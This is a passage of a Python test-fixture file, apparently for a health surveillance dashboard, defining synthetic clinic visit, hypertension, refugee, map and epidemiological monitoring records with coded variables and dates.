# New visits
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9323', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_1": 1, "visit_age_20": 1, "visit_age_13": 1, "prc_2": 1, "visit_ncd_1": 1, "visit_lab_3": 1, "visit_smo_4": 1, "vis_4":1, "vis_0": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9371', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_1": 1, "visit_age_20": 1, "visit_age_13": 1, "prc_2": 1, "visit_ncd_1": 1, "visit_lab_4": 1, "visit_lab_5": 1, "visit_lab_3":1, "visit_smo_2": 1, "visit_smo_4": 1, "visit_lab_8": 1, "vis_4":1, "vis_0": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9372', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_2": 1, "visit_age_23": 1, "visit_age_8": 1, "prc_2": 1, "visit_ncd_1": 1, "visit_lab_8": 1, "visit_lab_9": 1, "vis_4": 1, "vis_0": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9373', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_2": 1, "visit_age_24": 1, "visit_age_9": 1, "prc_2": 1, "visit_ncd_1": 1, "visit_com_2": 1, "visit_lab_7": 1, "visit_lab_6":1, "visit_lab_10":1, "visit_lab_11": 1, "vis_4":1, "vis_0": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
# Hypertension
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9324', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_1": 1, "visit_age_22": 1, "visit_age_204": 1, "prc_2": 1, "visit_ncd_2": 1, "visit_lab_1": 1, "vis_4":1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9375', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_1": 1, "visit_age_22": 1, "visit_age_14": 1, "prc_2": 1, "visit_ncd_2": 1, "visit_lab_1": 1, "visit_lab_2": 1,"visit_smo_4": 1, "visit_smo_2": 1, "visit_lab_10": 1, "visit_lab_11": 1, "vis_4":1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9376', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_2": 1, "visit_age_23": 1, "visit_age_8": 1, "prc_2": 1, "visit_ncd_2": 1, "visit_lab_3": 1, "visit_lab_4": 1, "vis_4":1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9377', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_2": 1, "visit_age_24": 1, "visit_age_9": 1, "prc_2": 1, "visit_ncd_2": 1, "visit_com_1": 1, "vis_4":1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
# Return visits
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9323', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_1": 1, "visit_age_20": 1, "visit_age_13": 1, "prc_2": 1, "visit_ncd_1": 1, "visit_lab_3": 1, "visit_smo_4": 1, "vis_5":1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9371', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_1": 1, "visit_age_20": 1, "visit_age_13": 1, "prc_2": 1, "visit_ncd_1": 1, "visit_lab_4": 1, "visit_lab_5": 1, "visit_lab_3":1, "visit_smo_2": 1, "visit_smo_4": 1, "visit_lab_8": 1, "vis_5":1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9372', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_2": 1, "visit_age_23": 1, "visit_age_8": 1, "prc_2": 1, "visit_ncd_1": 1, "visit_lab_8": 1, "visit_lab_9": 1, "vis_5":1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9373', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_2": 1, "visit_age_24": 1, "visit_age_9": 1, "prc_2": 1, "visit_ncd_1": 1, "visit_com_2": 1, "visit_lab_7": 1, "visit_lab_6":1, "visit_lab_10":1, "visit_lab_11": 1, "vis_5":1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
# Hypertension
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9324', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_1": 1, "visit_age_22": 1, "visit_age_14": 1, "prc_2": 1, "visit_ncd_2": 1, "visit_lab_1": 1, "vis_5":1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9375', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_1": 1, "visit_age_22": 1, "visit_age_14": 1, "prc_2": 1, "visit_ncd_2": 1, "visit_lab_1": 1, "visit_lab_2": 1,"visit_smo_4": 1, "visit_smo_2": 1, "visit_lab_10": 1, "visit_lab_11": 1, "vis_5":1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9376', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_2": 1, "visit_age_23": 1, "visit_age_8": 1, "prc_2": 1, "visit_ncd_2": 1, "visit_lab_3": 1, "visit_lab_4": 1, "vis_5":1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9377', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "visit_gen_2": 1, "visit_age_24": 1, "visit_age_9": 1, "prc_2": 1, "visit_ncd_2": 1, "visit_com_1": 1, "vis_5":1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)})
]
pip_report = [
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9321', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_1": 1, "age_7": 1,"nat_1": 1, "sta_1": 1, "pip_1": 1, "pip_2": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9372', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_1": 1,"nat_1": 1, "sta_1": 1, "age_13": 1, "pip_1": 1, "pip_2": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9373', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_3": 1,"nat_1": 1, "sta_1": 1, "age_9": 1, "pip_1": 1, "pip_2": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9374', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_4": 1,"nat_1": 1, "sta_1": 1, "age_10": 1, "pip_1": 1, "pip_2": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9325', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_2": 1,"nat_1": 1, "sta_1": 1, "age_14": 1, "pip_1": 1, "pip_2": 1, "pip_3": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 6, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9376', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_2": 1, "nat_1": 1, "sta_1": 1,"age_14": 1, "pip_1": 1, "pip_2": 1, "pip_3": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 6, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9377', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_3": 1, "nat_1": 1, "sta_1": 1,"age_9": 1, "pip_1": 1, "pip_2": 1}, 'clinic': 10, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 7, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9378', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_4": 1,"nat_2": 1, "sta_2": 1, "age_10": 1, "pip_1": 1, "pip_2": 1}, 'clinic': 10, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 7, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9379', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_4": 1,"nat_2": 1, "sta_2": 1, "age_9": 1, "pip_1": 1, "pip_3": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2016, 4, 30, 23, 54, 16, 49059)})
]
refugee_data = [
# Population and other cumulative numbers should be taken from the second entry
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Refugee', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, 'ref_1': 1, 'ref_2': 1, 'ref_3': 1, 'ref_4': 1, 'ref_5': 1, 'ref_6': 1, 'ref_7': 1, 'ref_8': 1, 'ref_9': 1, 'ref_10': 1, 'ref_11': 1, 'ref_12': 1, 'ref_14': 1, 'ref_13': 50,'ref_15': 1, 'ref_16': 2, 'ref_19': 1, 'ref_20': 1, 'ref_60': 1, 'ref_61': 2, 'ref_95': 1, 'ref_96': 1, 'ref_331': 1, 'ref_332': 1, 'ref_460': 1, 'ref_462': 2, 'ref_557': 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:fe301f1b-c541-4dde-a355-1552b03e6b7f', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 4, 13, 0, 0), 'clinic_type': 'Refugee', 'district': 6, 'region': 3, 'clinic': 11, 'variables': {"data_entry":1, 'ref_1': 2, 'ref_2': 3, 'ref_3': 4, 'ref_4': 5, 'ref_5': 6, 'ref_6': 7, 'ref_7': 8, 'ref_9': 9, 'ref_10': 10, 'ref_11': 11, 'ref_12': 12, 'ref_14': 5, 'ref_13': 100,'ref_15': 1, 'ref_16': 2, 'ref_19': 1, 'ref_20': 1, 'ref_60': 1, 'ref_61': 2, 'ref_95': 1, 'ref_96': 1, 'ref_331': 1, 'ref_332': 1, 'ref_460': 1, 'ref_462': 2, 'ref_557': 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:1d337c48-853c-4fc2-93b9-2e5aa74d72b3', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 4, 29, 0, 0), 'clinic_type': 'Refugee', 'district': 5, 'region': 2, 'clinic': 7, 'variables': {"data_entry":1, 'ref_1': 1, 'ref_2': 1, 'ref_3': 1, 'ref_4': 1, 'ref_5': 1, 'ref_6': 1, 'ref_7': 1, 'ref_8': 1, 'ref_9': 1, 'ref_10': 1, 'ref_11': 1, 'ref_12': 1, 'ref_14': 1, 'ref_13': 20, 'ref_15': 1, 'ref_16': 2, 'ref_19': 1, 'ref_20': 1, 'ref_60': 1, 'ref_61': 1, 'ref_95': 1, 'ref_96': 1, 'ref_331': 1, 'ref_332': 1, 'ref_460': 1, 'ref_462': 3, 'ref_557': 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:c35445a9-eabc-4609-bcb7-4a333c0e23f1', 'country': 1}),
Data(**{'date': datetime.datetime(2016, 4, 29, 0, 0), 'clinic_type': 'Refugee', 'district': 5, 'region': 2, 'clinic': 7, 'variables': {"data_entry":1, 'ref_1': 1, 'ref_2': 1, 'ref_3': 1, 'ref_4': 1, 'ref_5': 1, 'ref_6': 1, 'ref_7': 1, 'ref_8': 1, 'ref_9': 1, 'ref_10': 1, 'ref_11': 1, 'ref_12': 1, 'ref_14': 1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:c35445a9-eabc-4609-bcb7-4a333c0e23f2', 'country': 1})
]
year = datetime.datetime.now().year
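# Frontpage and map test data use the current year so the records always fall
# inside the live reporting period.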
frontpage = [
# Registers, total cases = 15
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a5', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'reg_1': 1, 'reg_2': 15 }, 'clinic': 8, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 11, 32, 51, 80545), 'epi_week': 18}),
# Cases, total cases = 10: 3 males, 7 females, 2 per age category, 7 Demo nationality, 3 null
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9323', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_1": 1, "age_13": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1 }, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059), 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9324', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "alert_reason": "cmd_5", "alert": 1, "tot_1":1, "gen_1": 1, "age_1": 1, "age_13": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1 }, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059), 'epi_week': 18})
]
map_test = [
# Cases, total cases = 10: 3 males, 7 females, 2 per age category, 7 Demo nationality, 3 null
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9321', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_1": 1, "age_13": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1 }, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9372', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_1": 1, "age_13": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1, "mod_1":1, "mod_2": 1, "mod_3": 1, "mod_4": 1, "mod_5": 1 }, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9373', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_2": 1, "age_8": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1 }, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9374', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_2": 1, "age_8": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1 }, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9375', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_3": 1, "age_9": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1 }, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9376', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_3": 1, "age_15": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1, "smo_2": 1, "smo_1": 1 }, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9377', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_4": 1 , "age_10": 1, "nat_2": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9378', 'clinic_type': 'Hospital', 'district': 5, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_4": 1 , "age_10": 1, "nat_2": 1, "sta_1": 1, "prc_2": 1, "ncd_2": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(year, 5, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9379', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_5": 1, "age_11": 1, "nat_2": 1, "sta_1": 1, "prc_2": 1 , "ncd_1": 1, "icb_47": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9380', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_5": 1, "age_11": 1, "nat_1": 1, "sta_2": 1, "prc_3": 1, "icb_54": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(year, 4, 30, 23, 54, 16, 49059)}),
]
epi_monitoring = [
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, 'alert': 1, 'alert_reason':'cmd_1', 'ale_1':'1' ,'cmd_43': 1,'cmd_48': 1, 'epi_1': 1, 'epi_2': 1, 'epi_3': 1, 'epi_4': 1, 'epi_5': 1, 'epi_6': 1, 'epi_7': 1,'icd_1': 1, 'icd_113': 1, 'icd_168': 1, 'icd_17': 1, 'icd_188': 1, 'icd_2189': 1, 'icd_2194': 1, 'icd_321': 1, 'icd_35': 1, 'icd_380': 1, 'icd_391': 1, 'icd_4177': 1, 'icd_4183': 1, 'icd_421': 1, 'icd_461': 1, 'icd_488': 1, 'icd_530': 1, 'icd_68': 1, 'icd_804': 1, 'icd_91': 1, 'icd_9225': 1, 'icd_9643': 1, 'reg_4': 1, 'mat_0': 1, 'mat_1': 1, 'mat_2': 1, 'mat_3': 1, 'mat_4': 1, 'mat_5': 1, 'mat_6': 1, 'mat_7': 1, 'mat_8': 1, 'mat_9': 1, 'dea_0': 1, 'dea_1': 1, 'dea_2': 1, 'dea_3': 1, 'dea_4': 1, 'dea_5': 1, 'dea_6': 1, 'dea_7': 1, 'dea_8': 1, 'dea_9': 1, 'mor_1':1, 'mor_2':1, 'mor_3':1, 'mor_4':1, 'mor_5':1, 'mor_6':1, 'mor_7':1, 'mor_8':1, 'mor_9':1, 'mor_10':1, 'mor_11':1, 'mor_12':1, 'mor_13':1, 'mor_14':1, 'mor_15':1, 'mor_16':1, 'mor_17':1, 'mor_18':1, 'mor_19':1, 'mor_20':1, 'mor_21':1, 'mor_22':1, 'mor_23':1, 'mor_24':1, 'mor_25':1, 'mor_26':1, 'mor_27':1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:fe301f1b-c541-4dde-a355-1552b03e6b7f', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_1":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:1', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_4":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:2', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_5":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:3', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_6":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:4', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_7":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:5', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_8":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:6', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_9":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:7', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_10":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:8', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_11":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:9', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_12":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:10', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_13":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:11', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_15":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:12', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_16":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:13', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_18":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:14', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_19":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:15', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_20":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:16', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_23":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:17', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_24":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:18', 'country': 1}),
Data(**{'date': datetime.datetime(2015, 1, 1, 0, 0), 'clinic_type': 'Hospital', 'district': 6, 'region': 3, 'clinic': 7, 'variables': {"data_entry":1, "cmd_25":1}, 'geolocation': 'POINT(0 0)', 'uuid': 'uuid:19', 'country': 1}),
